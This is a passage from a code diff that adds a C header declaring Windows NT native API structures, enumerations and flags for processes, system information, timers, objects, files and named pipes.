+	CLIENT_ID       ClientId;
+	KPRIORITY       Priority;
+	KPRIORITY       BasePriority;
+	ULONG           ContextSwitchCount;
+	THREAD_STATE    State;
+	KWAIT_REASON    WaitReason;
+} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;
+
+typedef struct _SYSTEM_PROCESSES_INFORMATION {
+	ULONG NextEntryDelta;
+	ULONG ThreadCount;
+	LARGE_INTEGER SpareLi1;
+	LARGE_INTEGER SpareLi2;
+	LARGE_INTEGER SpareLi3;
+	LARGE_INTEGER CreateTime;
+	LARGE_INTEGER UserTime;
+	LARGE_INTEGER KernelTime;
+	UNICODE_STRING ImageName;
+	KPRIORITY BasePriority;
+	HANDLE UniqueProcessId;
+	HANDLE InheritedFromUniqueProcessId;
+	ULONG HandleCount;
+	ULONG SessionId;
+	ULONG_PTR PageDirectoryBase;
+	VM_COUNTERS VmCounters;
+	IO_COUNTERS IoCounters;
+	SYSTEM_THREAD_INFORMATION Threads[1];
+} SYSTEM_PROCESSES_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION;
+
+typedef enum _PROCESSINFOCLASS {
+	ProcessBasicInformation = 0,
+	ProcessQuotaLimits = 1,
+	ProcessIoCounters = 2,
+	ProcessVmCounters = 3,
+	ProcessTimes = 4,
+	ProcessBasePriority = 5,
+	ProcessRaisePriority = 6,
+	ProcessDebugPort = 7,
+	ProcessExceptionPort = 8,
+	ProcessAccessToken = 9,
+	ProcessLdtInformation = 10,
+	ProcessLdtSize = 11,
+	ProcessDefaultHardErrorMode = 12,
+	ProcessIoPortHandlers = 13,
+	ProcessPooledUsageAndLimits = 14,
+	ProcessWorkingSetWatch = 15,
+	ProcessUserModeIOPL = 16,
+	ProcessEnableAlignmentFaultFixup = 17,
+	ProcessPriorityClass = 18,
+	ProcessWx86Information = 19,
+	ProcessHandleCount = 20,
+	ProcessAffinityMask = 21,
+	ProcessPriorityBoost = 22,
+	ProcessDeviceMap = 23,
+	ProcessSessionInformation = 24,
+	ProcessForegroundInformation = 25,
+	ProcessWow64Information = 26,
+	ProcessImageFileName = 27,
+	ProcessLUIDDeviceMapsEnabled = 28,
+	ProcessBreakOnTermination = 29,
+	ProcessDebugObjectHandle = 30,
+	ProcessDebugFlags = 31,
+	ProcessHandleTracing = 32,
+	ProcessIoPriority = 33,
+	ProcessExecuteFlags = 34,
+	ProcessTlsInformation = 35,
+	ProcessCookie = 36,
+	ProcessImageInformation = 37,
+	ProcessCycleTime = 38,
+	ProcessPagePriority = 39,
+	ProcessInstrumentationCallback = 40,
+	ProcessThreadStackAllocation = 41,
+	ProcessWorkingSetWatchEx = 42,
+	ProcessImageFileNameWin32 = 43,
+	ProcessImageFileMapping = 44,
+	ProcessAffinityUpdateMode = 45,
+	ProcessMemoryAllocationMode = 46,
+	ProcessGroupInformation = 47,
+	ProcessTokenVirtualizationEnabled = 48,
+	ProcessOwnerInformation = 49,
+	ProcessWindowInformation = 50,
+	ProcessHandleInformation = 51,
+	ProcessMitigationPolicy = 52,
+	ProcessDynamicFunctionTableInformation = 53,
+	ProcessHandleCheckingMode = 54,
+	ProcessKeepAliveCount = 55,
+	ProcessRevokeFileHandles = 56,
+	ProcessWorkingSetControl = 57,
+	ProcessHandleTable = 58,
+	ProcessCheckStackExtentsMode = 59,
+	ProcessCommandLineInformation = 60,
+	ProcessProtectionInformation = 61,
+	MaxProcessInfoClass = 62
+} PROCESSINFOCLASS;
+
+typedef struct _PROCESS_BASIC_INFORMATION {
+	NTSTATUS ExitStatus;
+	PVOID PebBaseAddress;
+	ULONG_PTR AffinityMask;
+	KPRIORITY BasePriority;
+	ULONG_PTR UniqueProcessId;
+	ULONG_PTR InheritedFromUniqueProcessId;
+} PROCESS_BASIC_INFORMATION;
+typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION;
+
+typedef struct _PROCESS_EXTENDED_BASIC_INFORMATION {
+	SIZE_T Size;
+	PROCESS_BASIC_INFORMATION BasicInfo;
+	union
+	{
+		ULONG Flags;
+		struct
+		{
+			ULONG IsProtectedProcess : 1;
+			ULONG IsWow64Process : 1;
+			ULONG IsProcessDeleting : 1;
+			ULONG IsCrossSessionCreate : 1;
+			ULONG IsFrozen : 1;
+			ULONG IsBackground : 1;
+			ULONG IsStronglyNamed : 1;
+			ULONG SpareBits : 25;
+		} DUMMYSTRUCTNAME;
+	} DUMMYUNIONNAME;
+} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION;
+
+/*
+** Processes END
+*/
+
+#ifndef _SYSTEM_INFORMATION_CLASS
+typedef enum _SYSTEM_INFORMATION_CLASS
+{
+	SystemBasicInformation = 0,
+	SystemProcessorInformation = 1,
+	SystemPerformanceInformation = 2,
+	SystemTimeOfDayInformation = 3,
+	SystemPathInformation = 4,
+	SystemProcessInformation = 5,
+	SystemCallCountInformation = 6,
+	SystemDeviceInformation = 7,
+	SystemProcessorPerformanceInformation = 8,
+	SystemFlagsInformation = 9,
+	SystemCallTimeInformation = 10,
+	SystemModuleInformation = 11,
+	SystemLocksInformation = 12,
+	SystemStackTraceInformation = 13,
+	SystemPagedPoolInformation = 14,
+	SystemNonPagedPoolInformation = 15,
+	SystemHandleInformation = 16,
+	SystemObjectInformation = 17,
+	SystemPageFileInformation = 18,
+	SystemVdmInstemulInformation = 19,
+	SystemVdmBopInformation = 20,
+	SystemFileCacheInformation = 21,
+	SystemPoolTagInformation = 22,
+	SystemInterruptInformation = 23,
+	SystemDpcBehaviorInformation = 24,
+	SystemFullMemoryInformation = 25,
+	SystemLoadGdiDriverInformation = 26,
+	SystemUnloadGdiDriverInformation = 27,
+	SystemTimeAdjustmentInformation = 28,
+	SystemSummaryMemoryInformation = 29,
+	SystemMirrorMemoryInformation = 30,
+	SystemPerformanceTraceInformation = 31,
+	SystemObsolete0 = 32,
+	SystemExceptionInformation = 33,
+	SystemCrashDumpStateInformation = 34,
+	SystemKernelDebuggerInformation = 35,
+	SystemContextSwitchInformation = 36,
+	SystemRegistryQuotaInformation = 37,
+	SystemExtendServiceTableInformation = 38,
+	SystemPrioritySeperation = 39,
+	SystemVerifierAddDriverInformation = 40,
+	SystemVerifierRemoveDriverInformation = 41,
+	SystemProcessorIdleInformation = 42,
+	SystemLegacyDriverInformation = 43,
+	SystemCurrentTimeZoneInformation = 44,
+	SystemLookasideInformation = 45,
+	SystemTimeSlipNotification = 46,
+	SystemSessionCreate = 47,
+	SystemSessionDetach = 48,
+	SystemSessionInformation = 49,
+	SystemRangeStartInformation = 50,
+	SystemVerifierInformation = 51,
+	SystemVerifierThunkExtend = 52,
+	SystemSessionProcessInformation = 53,
+	SystemLoadGdiDriverInSystemSpace = 54,
+	SystemNumaProcessorMap = 55,
+	SystemPrefetcherInformation = 56,
+	SystemExtendedProcessInformation = 57,
+	SystemRecommendedSharedDataAlignment = 58,
+	SystemComPlusPackage = 59,
+	SystemNumaAvailableMemory = 60,
+	SystemProcessorPowerInformation = 61,
+	SystemEmulationBasicInformation = 62,
+	SystemEmulationProcessorInformation = 63,
+	SystemExtendedHandleInformation = 64,
+	SystemLostDelayedWriteInformation = 65,
+	SystemBigPoolInformation = 66,
+	SystemSessionPoolTagInformation = 67,
+	SystemSessionMappedViewInformation = 68,
+	SystemHotpatchInformation = 69,
+	SystemObjectSecurityMode = 70,
+	SystemWatchdogTimerHandler = 71,
+	SystemWatchdogTimerInformation = 72,
+	SystemLogicalProcessorInformation = 73,
+	SystemWow64SharedInformationObsolete = 74,
+	SystemRegisterFirmwareTableInformationHandler = 75,
+	SystemFirmwareTableInformation = 76,
+	SystemModuleInformationEx = 77,
+	SystemVerifierTriageInformation = 78,
+	SystemSuperfetchInformation = 79,
+	SystemMemoryListInformation = 80,
+	SystemFileCacheInformationEx = 81,
+	SystemThreadPriorityClientIdInformation = 82,
+	SystemProcessorIdleCycleTimeInformation = 83,
+	SystemVerifierCancellationInformation = 84,
+	SystemProcessorPowerInformationEx = 85,
+	SystemRefTraceInformation = 86,
+	SystemSpecialPoolInformation = 87,
+	SystemProcessIdInformation = 88,
+	SystemErrorPortInformation = 89,
+	SystemBootEnvironmentInformation = 90,
+	SystemHypervisorInformation = 91,
+	SystemVerifierInformationEx = 92,
+	SystemTimeZoneInformation = 93,
+	SystemImageFileExecutionOptionsInformation = 94,
+	SystemCoverageInformation = 95,
+	SystemPrefetchPatchInformation = 96,
+	SystemVerifierFaultsInformation = 97,
+	SystemSystemPartitionInformation = 98,
+	SystemSystemDiskInformation = 99,
+	SystemProcessorPerformanceDistribution = 100,
+	SystemNumaProximityNodeInformation = 101,
+	SystemDynamicTimeZoneInformation = 102,
+	SystemCodeIntegrityInformation = 103,
+	SystemProcessorMicrocodeUpdateInformation = 104,
+	SystemProcessorBrandString = 105,
+	SystemVirtualAddressInformation = 106,
+	SystemLogicalProcessorAndGroupInformation = 107,
+	SystemProcessorCycleTimeInformation = 108,
+	SystemStoreInformation = 109,
+	SystemRegistryAppendString = 110,
+	SystemAitSamplingValue = 111,
+	SystemVhdBootInformation = 112,
+	SystemCpuQuotaInformation = 113,
+	SystemNativeBasicInformation = 114,
+	SystemErrorPortTimeouts = 115,
+	SystemLowPriorityIoInformation = 116,
+	SystemBootEntropyInformation = 117,
+	SystemVerifierCountersInformation = 118,
+	SystemPagedPoolInformationEx = 119,
+	SystemSystemPtesInformationEx = 120,
+	SystemNodeDistanceInformation = 121,
+	SystemAcpiAuditInformation = 122,
+	SystemBasicPerformanceInformation = 123,
+	SystemQueryPerformanceCounterInformation = 124,
+	SystemSessionBigPoolInformation = 125,
+	SystemBootGraphicsInformation = 126,
+	SystemScrubPhysicalMemoryInformation = 127,
+	SystemBadPageInformation = 128,
+	SystemProcessorProfileControlArea = 129,
+	SystemCombinePhysicalMemoryInformation = 130,
+	SystemEntropyInterruptTimingInformation = 131,
+	SystemConsoleInformation = 132,
+	SystemPlatformBinaryInformation = 133,
+	SystemPolicyInformation = 134,
+	SystemHypervisorProcessorCountInformation = 135,
+	SystemDeviceDataInformation = 136,
+	SystemDeviceDataEnumerationInformation = 137,
+	SystemMemoryTopologyInformation = 138,
+	SystemMemoryChannelInformation = 139,
+	SystemBootLogoInformation = 140,
+	SystemProcessorPerformanceInformationEx = 141,
+	SystemSpare0 = 142,
+	SystemSecureBootPolicyInformation = 143,
+	SystemPageFileInformationEx = 144,
+	SystemSecureBootInformation = 145,
+	SystemEntropyInterruptTimingRawInformation = 146,
+	SystemPortableWorkspaceEfiLauncherInformation = 147,
+	SystemFullProcessInformation = 148,
+	SystemKernelDebuggerInformationEx = 149,
+	SystemBootMetadataInformation = 150,
+	SystemSoftRebootInformation = 151,
+	SystemElamCertificateInformation = 152,
+	SystemOfflineDumpConfigInformation = 153,
+	SystemProcessorFeaturesInformation = 154,
+	SystemRegistryReconciliationInformation = 155,
+	SystemEdidInformation = 156,
+	MaxSystemInfoClass = 157
+} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
+#endif
+
+/*
+** Timer START
+*/
+
+//
+// Timer APC routine definition.
+//
+
+typedef VOID(*PTIMER_APC_ROUTINE) (
+	_In_ PVOID TimerContext,
+	_In_ ULONG TimerLowValue,
+	_In_ LONG TimerHighValue
+	);
+
+typedef enum _TIMER_TYPE {
+	NotificationTimer,
+	SynchronizationTimer
+} TIMER_TYPE;
+
+#ifndef _TIMER_INFORMATION_CLASS
+typedef enum _TIMER_INFORMATION_CLASS {
+	TimerBasicInformation
+} TIMER_INFORMATION_CLASS;
+#endif
+
+#ifndef _TIMER_BASIC_INFORMATION
+typedef struct _TIMER_BASIC_INFORMATION {
+	LARGE_INTEGER RemainingTime;
+	BOOLEAN TimerState;
+} TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION;
+#endif
+
+/*
+** Timer END
+*/
+
+typedef VOID(NTAPI *PIO_APC_ROUTINE)(
+	_In_ PVOID ApcContext,
+	_In_ PIO_STATUS_BLOCK IoStatusBlock,
+	_In_ ULONG Reserved
+	);
+
+typedef struct _OBJECT_DIRECTORY_INFORMATION {
+	UNICODE_STRING Name;
+	UNICODE_STRING TypeName;
+} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;
+
+#ifndef InitializeObjectAttributes
+#define InitializeObjectAttributes( p, n, a, r, s ) { \
+    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
+    (p)->RootDirectory = r;                             \
+    (p)->Attributes = a;                                \
+    (p)->ObjectName = n;                                \
+    (p)->SecurityDescriptor = s;                        \
+    (p)->SecurityQualityOfService = NULL;               \
+    }
+
+//
+// Valid values for the Attributes field
+//
+
+#define OBJ_INHERIT             0x00000002L
+#define OBJ_PERMANENT           0x00000010L
+#define OBJ_EXCLUSIVE           0x00000020L
+#define OBJ_CASE_INSENSITIVE    0x00000040L
+#define OBJ_OPENIF              0x00000080L
+#define OBJ_OPENLINK            0x00000100L
+#define OBJ_KERNEL_HANDLE       0x00000200L
+#define OBJ_FORCE_ACCESS_CHECK  0x00000400L
+#define OBJ_VALID_ATTRIBUTES    0x000007F2L
+
+#endif
+
+
+/*
+** Objects START
+*/
+
+#ifndef _OBJECT_INFORMATION_CLASS
+typedef enum _OBJECT_INFORMATION_CLASS {
+	ObjectBasicInformation,
+	ObjectNameInformation,
+	ObjectTypeInformation,
+	ObjectTypesInformation,
+	ObjectHandleFlagInformation,
+	ObjectSessionInformation,
+	MaxObjectInfoClass
+} OBJECT_INFORMATION_CLASS;
+#endif
+
+#ifndef _OBJECT_BASIC_INFORMATION
+typedef struct _OBJECT_BASIC_INFORMATION {
+	ULONG Attributes;
+	ACCESS_MASK GrantedAccess;
+	ULONG HandleCount;
+	ULONG PointerCount;
+	ULONG PagedPoolCharge;
+	ULONG NonPagedPoolCharge;
+	ULONG Reserved[3];
+	ULONG NameInfoSize;
+	ULONG TypeInfoSize;
+	ULONG SecurityDescriptorSize;
+	LARGE_INTEGER CreationTime;
+} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION;
+#endif
+
+#ifndef _OBJECT_NAME_INFORMATION
+typedef struct _OBJECT_NAME_INFORMATION {
+	UNICODE_STRING Name;
+} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;
+#endif
+
+#ifndef _OBJECT_TYPE_INFORMATION
+typedef struct _OBJECT_TYPE_INFORMATION {
+	UNICODE_STRING TypeName;
+	ULONG TotalNumberOfObjects;
+	ULONG TotalNumberOfHandles;
+	ULONG TotalPagedPoolUsage;
+	ULONG TotalNonPagedPoolUsage;
+	ULONG TotalNamePoolUsage;
+	ULONG TotalHandleTableUsage;
+	ULONG HighWaterNumberOfObjects;
+	ULONG HighWaterNumberOfHandles;
+	ULONG HighWaterPagedPoolUsage;
+	ULONG HighWaterNonPagedPoolUsage;
+	ULONG HighWaterNamePoolUsage;
+	ULONG HighWaterHandleTableUsage;
+	ULONG InvalidAttributes;
+	GENERIC_MAPPING GenericMapping;
+	ULONG ValidAccessMask;
+	BOOLEAN SecurityRequired;
+	BOOLEAN MaintainHandleCount;
+	ULONG PoolType;
+	ULONG DefaultPagedPoolCharge;
+	ULONG DefaultNonPagedPoolCharge;
+} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;
+#endif
+
+#ifndef _OBJECT_TYPES_INFORMATION
+typedef struct _OBJECT_TYPES_INFORMATION
+{
+	ULONG NumberOfTypes;
+	OBJECT_TYPE_INFORMATION TypeInformation;
+} OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION;
+#endif
+
+#ifndef _OBJECT_HANDLE_FLAG_INFORMATION
+typedef struct _OBJECT_HANDLE_FLAG_INFORMATION
+{
+	BOOLEAN Inherit;
+	BOOLEAN ProtectFromClose;
+} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION;
+#endif
+/*
+** Objects END
+*/
+
+/*
+** File start
+*/
+
+#define FILE_SUPERSEDE                  0x00000000
+#define FILE_OPEN                       0x00000001
+#define FILE_CREATE                     0x00000002
+#define FILE_OPEN_IF                    0x00000003
+#define FILE_OVERWRITE                  0x00000004
+#define FILE_OVERWRITE_IF               0x00000005
+#define FILE_MAXIMUM_DISPOSITION        0x00000005
+
+#define FILE_DIRECTORY_FILE                     0x00000001
+#define FILE_WRITE_THROUGH                      0x00000002
+#define FILE_SEQUENTIAL_ONLY                    0x00000004
+#define FILE_NO_INTERMEDIATE_BUFFERING          0x00000008
+
+#define FILE_SYNCHRONOUS_IO_ALERT               0x00000010
+#define FILE_SYNCHRONOUS_IO_NONALERT            0x00000020
+#define FILE_NON_DIRECTORY_FILE                 0x00000040
+#define FILE_CREATE_TREE_CONNECTION             0x00000080
+
+#define FILE_COMPLETE_IF_OPLOCKED               0x00000100
+#define FILE_NO_EA_KNOWLEDGE                    0x00000200
+#define FILE_OPEN_FOR_RECOVERY                  0x00000400
+#define FILE_RANDOM_ACCESS                      0x00000800
+
+#define FILE_DELETE_ON_CLOSE                    0x00001000
+#define FILE_OPEN_BY_FILE_ID                    0x00002000
+#define FILE_OPEN_FOR_BACKUP_INTENT             0x00004000
+#define FILE_NO_COMPRESSION                     0x00008000
+
+#define FILE_RESERVE_OPFILTER                   0x00100000
+#define FILE_OPEN_REPARSE_POINT                 0x00200000
+#define FILE_OPEN_NO_RECALL                     0x00400000
+#define FILE_OPEN_FOR_FREE_SPACE_QUERY          0x00800000
+
+
+#define FILE_COPY_STRUCTURED_STORAGE            0x00000041
+#define FILE_STRUCTURED_STORAGE                 0x00000441
+
+#define FILE_VALID_OPTION_FLAGS                 0x00ffffff
+#define FILE_VALID_PIPE_OPTION_FLAGS            0x00000032
+#define FILE_VALID_MAILSLOT_OPTION_FLAGS        0x00000032
+#define FILE_VALID_SET_FLAGS                    0x00000036
+
+#ifndef _FILE_INFORMATION_CLASS
+typedef enum _FILE_INFORMATION_CLASS
+{
+	FileDirectoryInformation = 1,
+	FileFullDirectoryInformation,
+	FileBothDirectoryInformation,
+	FileBasicInformation,
+	FileStandardInformation,
+	FileInternalInformation,
+	FileEaInformation,
+	FileAccessInformation,
+	FileNameInformation,
+	FileRenameInformation,
+	FileLinkInformation,
+	FileNamesInformation,
+	FileDispositionInformation,
+	FilePositionInformation,
+	FileFullEaInformation,
+	FileModeInformation,
+	FileAlignmentInformation,
+	FileAllInformation,
+	FileAllocationInformation,
+	FileEndOfFileInformation,
+	FileAlternateNameInformation,
+	FileStreamInformation,
+	FilePipeInformation,
+	FilePipeLocalInformation,
+	FilePipeRemoteInformation,
+	FileMailslotQueryInformation,
+	FileMailslotSetInformation,
+	FileCompressionInformation,
+	FileObjectIdInformation,
+	FileCompletionInformation,
+	FileMoveClusterInformation,
+	FileQuotaInformation,
+	FileReparsePointInformation,
+	FileNetworkOpenInformation,
+	FileAttributeTagInformation,
+	FileTrackingInformation,
+	FileIdBothDirectoryInformation,
+	FileIdFullDirectoryInformation,
+	FileValidDataLengthInformation,
+	FileShortNameInformation,
+	FileIoCompletionNotificationInformation,
+	FileIoStatusBlockRangeInformation,
+	FileIoPriorityHintInformation,
+	FileSfioReserveInformation,
+	FileSfioVolumeInformation,
+	FileHardLinkInformation,
+	FileProcessIdsUsingFileInformation,
+	FileNormalizedNameInformation,
+	FileNetworkPhysicalNameInformation,
+	FileIdGlobalTxDirectoryInformation,
+	FileMaximumInformation
+} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
+#endif
+
+typedef struct _FILE_BASIC_INFORMATION {
+	LARGE_INTEGER CreationTime;
+	LARGE_INTEGER LastAccessTime;
+	LARGE_INTEGER LastWriteTime;
+	LARGE_INTEGER ChangeTime;
+	ULONG FileAttributes;
+} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
+
+typedef struct _FILE_STANDARD_INFORMATION
+{
+	LARGE_INTEGER AllocationSize;
+	LARGE_INTEGER EndOfFile;
+	ULONG NumberOfLinks;
+	UCHAR DeletePending;
+	UCHAR Directory;
+} FILE_STANDARD_INFORMATION;
+
+typedef struct _FILE_INTERNAL_INFORMATION {
+	LARGE_INTEGER IndexNumber;
+} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION;
+
+typedef struct _FILE_EA_INFORMATION {
+	ULONG EaSize;
+} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;
+
+typedef struct _FILE_ACCESS_INFORMATION {
+	ACCESS_MASK AccessFlags;
+} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;
+
+typedef struct _FILE_POSITION_INFORMATION {
+	LARGE_INTEGER CurrentByteOffset;
+} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION;
+
+typedef struct _FILE_MODE_INFORMATION {
+	ULONG Mode;
+} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION;
+
+typedef struct _FILE_ALIGNMENT_INFORMATION {
+	ULONG AlignmentRequirement;
+} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION;
+
+typedef struct _FILE_NAME_INFORMATION {
+	ULONG FileNameLength;
+	WCHAR FileName[1];
+} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
+
+typedef struct _FILE_ALL_INFORMATION {
+	FILE_BASIC_INFORMATION BasicInformation;
+	FILE_STANDARD_INFORMATION StandardInformation;
+	FILE_INTERNAL_INFORMATION InternalInformation;
+	FILE_EA_INFORMATION EaInformation;
+	FILE_ACCESS_INFORMATION AccessInformation;
+	FILE_POSITION_INFORMATION PositionInformation;
+	FILE_MODE_INFORMATION ModeInformation;
+	FILE_ALIGNMENT_INFORMATION AlignmentInformation;
+	FILE_NAME_INFORMATION NameInformation;
+} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION;
+
+typedef struct _FILE_NETWORK_OPEN_INFORMATION {
+	LARGE_INTEGER CreationTime;
+	LARGE_INTEGER LastAccessTime;
+	LARGE_INTEGER LastWriteTime;
+	LARGE_INTEGER ChangeTime;
+	LARGE_INTEGER AllocationSize;
+	LARGE_INTEGER EndOfFile;
+	ULONG FileAttributes;
+} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;
+
+typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {
+	ULONG FileAttributes;
+	ULONG ReparseTag;
+} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION;
+
+typedef struct _FILE_ALLOCATION_INFORMATION {
+	LARGE_INTEGER AllocationSize;
+} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION;
+
+typedef struct _FILE_COMPRESSION_INFORMATION {
+	LARGE_INTEGER CompressedFileSize;
+	USHORT CompressionFormat;
+	UCHAR CompressionUnitShift;
+	UCHAR ChunkShift;
+	UCHAR ClusterShift;
+	UCHAR Reserved[3];
+} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION;
+
+typedef struct _FILE_DISPOSITION_INFORMATION {
+	BOOLEAN DeleteFile;
+} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION;
+
+typedef struct _FILE_END_OF_FILE_INFORMATION {
+	LARGE_INTEGER EndOfFile;
+} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION;
+
+typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {
+	LARGE_INTEGER ValidDataLength;
+} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION;
+
+typedef struct _FILE_LINK_INFORMATION {
+	BOOLEAN ReplaceIfExists;
+	HANDLE RootDirectory;
+	ULONG FileNameLength;
+	WCHAR FileName[1];
+} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
+
+typedef struct _FILE_MOVE_CLUSTER_INFORMATION {
+	ULONG ClusterCount;
+	HANDLE RootDirectory;
+	ULONG FileNameLength;
+	WCHAR FileName[1];
+} FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION;
+
+typedef struct _FILE_RENAME_INFORMATION {
+	BOOLEAN ReplaceIfExists;
+	HANDLE RootDirectory;
+	ULONG FileNameLength;
+	WCHAR FileName[1];
+} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;
+
+typedef struct _FILE_STREAM_INFORMATION {
+	ULONG NextEntryOffset;
+	ULONG StreamNameLength;
+	LARGE_INTEGER StreamSize;
+	LARGE_INTEGER StreamAllocationSize;
+	WCHAR StreamName[1];
+} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION;
+
+typedef struct _FILE_TRACKING_INFORMATION {
+	HANDLE DestinationFile;
+	ULONG ObjectInformationLength;
+	CHAR ObjectInformation[1];
+} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION;
+
+typedef struct _FILE_COMPLETION_INFORMATION {
+	HANDLE Port;
+	PVOID Key;
+} FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION;
+
+//
+// Define the NamedPipeType flags for NtCreateNamedPipeFile
+//
+
+#define FILE_PIPE_BYTE_STREAM_TYPE      0x00000000
+#define FILE_PIPE_MESSAGE_TYPE          0x00000001
+
+//
+// Define the CompletionMode flags for NtCreateNamedPipeFile
+//
+
+#define FILE_PIPE_QUEUE_OPERATION       0x00000000
+#define FILE_PIPE_COMPLETE_OPERATION    0x00000001
+
+//
+// Define the ReadMode flags for NtCreateNamedPipeFile
+//
+
+#define FILE_PIPE_BYTE_STREAM_MODE      0x00000000
+#define FILE_PIPE_MESSAGE_MODE          0x00000001
+
+//
+// Define the NamedPipeConfiguration flags for NtQueryInformation
+//
+
+#define FILE_PIPE_INBOUND               0x00000000
+#define FILE_PIPE_OUTBOUND              0x00000001
+#define FILE_PIPE_FULL_DUPLEX           0x00000002
+
+//
+// Define the NamedPipeState flags for NtQueryInformation
+//
+
+#define FILE_PIPE_DISCONNECTED_STATE    0x00000001
+#define FILE_PIPE_LISTENING_STATE       0x00000002
+#define FILE_PIPE_CONNECTED_STATE       0x00000003
+#define FILE_PIPE_CLOSING_STATE         0x00000004
+
+//
+// Define the NamedPipeEnd flags for NtQueryInformation
+//
+
+#define FILE_PIPE_CLIENT_END            0x00000000
+#define FILE_PIPE_SERVER_END            0x00000001
+
+
+typedef struct _FILE_PIPE_INFORMATION {
+	ULONG ReadMode;
+	ULONG CompletionMode;
+} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION;
+
+typedef struct _FILE_PIPE_LOCAL_INFORMATION {
+	ULONG NamedPipeType;
+	ULONG NamedPipeConfiguration;
+	ULONG MaximumInstances;
+	ULONG CurrentInstances;
+	ULONG InboundQuota;
+	ULONG ReadDataAvailable;
+	ULONG OutboundQuota;
+	ULONG WriteQuotaAvailable;
+	ULONG NamedPipeState;
+	ULONG NamedPipeEnd;
+} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION;
+
+typedef struct _FILE_PIPE_REMOTE_INFORMATION {
+	LARGE_INTEGER CollectDataTime;
+	ULONG MaximumCollectionCount;
+} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION;
+
+typedef struct _FILE_MAILSLOT_QUERY_INFORMATION {
+	ULONG MaximumMessageSize;
+	ULONG MailslotQuota;
+	ULONG NextMessageSize;
+	ULONG MessagesAvailable;
+	LARGE_INTEGER ReadTimeout;
+} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION;
+
+typedef struct _FILE_MAILSLOT_SET_INFORMATION {
+	PLARGE_INTEGER ReadTimeout;
+} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION;
+
+typedef struct _FILE_REPARSE_POINT_INFORMATION {
+	LONGLONG FileReference;
+	ULONG Tag;
+} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION;
+
+typedef struct _FILE_FULL_EA_INFORMATION {
+	ULONG NextEntryOffset;
+	UCHAR Flags;
+	UCHAR EaNameLength;
+	USHORT EaValueLength;
+	CHAR EaName[1];
+} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;
+
+typedef struct _FILE_GET_EA_INFORMATION {
+	ULONG NextEntryOffset;
+	UCHAR EaNameLength;
+	CHAR EaName[1];
+} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION;
+
+typedef struct _FILE_GET_QUOTA_INFORMATION {
+	ULONG NextEntryOffset;
+	ULONG SidLength;
+	SID Sid;
+} FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION;
+
+typedef struct _FILE_QUOTA_INFORMATION {
+	ULONG NextEntryOffset;
+	ULONG SidLength;
+	LARGE_INTEGER ChangeTime;
+	LARGE_INTEGER QuotaUsed;
+	LARGE_INTEGER QuotaThreshold;
+	LARGE_INTEGER QuotaLimit;
+	SID Sid;
+} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION;
+
+typedef struct _FILE_DIRECTORY_INFORMATION {
+	ULONG NextEntryOffset;
+	ULONG FileIndex;
+	LARGE_INTEGER CreationTime;
+	LARGE_INTEGER LastAccessTime;
+	LARGE_INTEGER LastWriteTime;
+	LARGE_INTEGER ChangeTime;
+	LARGE_INTEGER EndOfFile;
+	LARGE_INTEGER AllocationSize;
+	ULONG FileAttributes;
+	ULONG FileNameLength;
+	WCHAR FileName[1];
+} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
+
+typedef struct _FILE_FULL_DIR_INFORMATION {
+	ULONG NextEntryOffset;
+	ULONG FileIndex;
